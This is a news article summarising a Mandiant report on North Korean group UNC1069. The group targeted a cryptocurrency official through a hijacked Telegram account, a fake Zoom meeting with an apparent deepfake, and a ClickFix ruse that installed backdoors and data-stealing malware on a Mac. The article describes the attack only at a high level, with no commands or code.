North Korean hackers targeted an official at a cryptocurrency company with several unique pieces of malware deployed alongside multiple scams, including a fake Zoom meeting, according to a new report from incident responders. Google-owned Mandiant published a detailed examination of a recent attack involving UNC1069 – a financially-motivated threat actor based in North Korea – that stood out due to how tailored and targeted it was to the victim. The hackers initially contacted the victim through Telegram using the compromised account of another cryptocurrency executive. The victim was sent a Calendly link for a 30-minute meeting that contained a Zoom meeting link.
The victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company that appeared to be a deepfake,” Mandiant explained. “While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar characteristics, where deepfakes were also allegedly used.” When the victim was in the meeting, the hackers claimed there were audio issues — prompting them to ask the victim to take several actions on their device to allegedly resolve them. The issues were a ruse to cover for a ClickFix attack – a technique where hackers install malware on a device by having the victim try to resolve fictitious technical issues.
In this case, the victim was directed to a web page with troubleshooting directions for both macOS systems and Windows systems. Embedded in the string of commands was one line that kicked off the infection chain. The victim followed the troubleshooting commands and their macOS device was infected. The first malicious files, which Mandiant called WAVESHAPER and HYPERCALL, are backdoors that allowed the hackers to install other tools that expanded their foothold on the victim’s device.
Mandiant said it found two data miners used by the threat actors called DEEPBREATH and CHROMEPUSH. DEEPBREATH enabled the hackers to steal credentials, browser data, user data from Telegram and other data from Apple Notes. The malware compresses all of the information into a ZIP archive and exfiltrates it to a remote server. CHROMEPUSH is a malicious tool made to look like a harmless browser extension for editing Google Docs offline.
Leave a Reply